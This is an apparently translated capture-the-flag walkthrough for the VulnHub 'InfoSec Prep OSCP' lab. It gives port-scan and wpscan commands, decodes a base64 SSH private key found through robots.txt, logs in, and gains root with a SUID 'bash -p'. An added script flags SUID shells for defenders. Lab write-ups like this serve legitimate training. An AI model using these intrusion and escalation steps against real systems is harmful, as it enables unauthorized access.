
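【攻略鸭】InfoSec Prep OSCP (VulnHub) Target Machine Walkthrough

2023-01-05 10:35 Author: 攻略鸭

The content of this article is purely fictional. Please follow, like and support 攻略鸭 on Bilibili!

Test machine IP address: 192.168.31.176

External information gathering

Port scan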

22/tcp    open  ssh     syn-ack ttl 64 OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp    open  http    syn-ack ttl 64 Apache httpd 2.4.41 ((Ubuntu))
33060/tcp open  socks5  syn-ack ttl 64

WordPress 5.4.2 blog content

XYZ Doohickey Company
a bike messenger
dog named Jack
live in Los Angeles
like piña coladas
user:oscp
Posting replies to blog entries is enabled
Search function: http://192.168.31.176/?s=
Login page: http://192.168.31.176/wp-login.php

wpscan --url http://192.168.31.176/ --enumerate vt,vp,u

Apache/2.4.41 (Ubuntu)

Known user: admin

robots.txt

http://192.168.31.176/robots.txt

Disallow: /secret.txt

/secret.txt


Base64-decode the content of /secret.txt (saved locally as test.txt)

$ base64 -d test.txt > test2.txt

Result:


The decoded file is an OpenSSH private key.

Connecting with the OpenSSH private key

mv test2.txt id_rsa
sudo ssh -i id_rsa oscp@192.168.31.176
yes
-bash-5.0$ id
uid=1000(oscp) gid=1000(oscp) groups=1000(oscp),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd)

Privilege escalation

Local information gathering

find / -perm -u=s -type f 2>/dev/null
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/fusermount
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/at
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/bash
/usr/bin/pkexec
/usr/bin/umount
/usr/bin/chsh
/usr/bin/su

SUID privilege escalation using the bash binary

bash-5.0$ /usr/bin/bash -p
bash-5.0# id
uid=1000(oscp) gid=1000(oscp) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd),1000(oscp)
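
An added example, not part of the original write-up: a defender-side check that takes a SUID listing such as the find output above and flags entries that are shells or script interpreters, which is the misconfiguration /usr/bin/bash represents on this machine. The function names and the set of risky basenames are assumptions of this example.

```shell
#!/usr/bin/env bash
# Added example: flag set-uid files that are shells or script interpreters.
# A set-uid shell hands the file owner's privileges to whoever runs it.

# Basenames treated as risky when set-uid (an assumption of this example;
# extend the patterns for the local environment).
is_risky_name() {
    case "$1" in
        sh|bash|dash|zsh|ksh|csh|tcsh|fish) return 0 ;;
        python*|perl*|ruby*|php*|lua*|node) return 0 ;;
        *) return 1 ;;
    esac
}

# Read one path per line on stdin; print the paths whose basename is risky.
flag_suid_interpreters() {
    local path
    while IFS= read -r path; do
        [ -n "$path" ] || continue
        if is_risky_name "${path##*/}"; then
            printf '%s\n' "$path"
        fi
    done
}

# SUID listing from the walkthrough, embedded so the check runs offline.
sample_suid_list() {
    cat <<'EOF'
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/fusermount
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/at
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/bash
/usr/bin/pkexec
/usr/bin/umount
/usr/bin/chsh
/usr/bin/su
EOF
}

# On a live host: enumerate set-uid files under a root directory and filter.
audit_host() {
    find "${1:-/}" -xdev -perm -u=s -type f 2>/dev/null | flag_suid_interpreters
}

# A finding is remediated by clearing the bit, e.g. chmod u-s /usr/bin/bash
sample_suid_list | flag_suid_interpreters
```

Run against the embedded listing, the only entry flagged is /usr/bin/bash; the other twelve entries are standard set-uid utilities.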

Other

flag

cat flag.txt
d73b04b0e696b0945283defa3eee4538
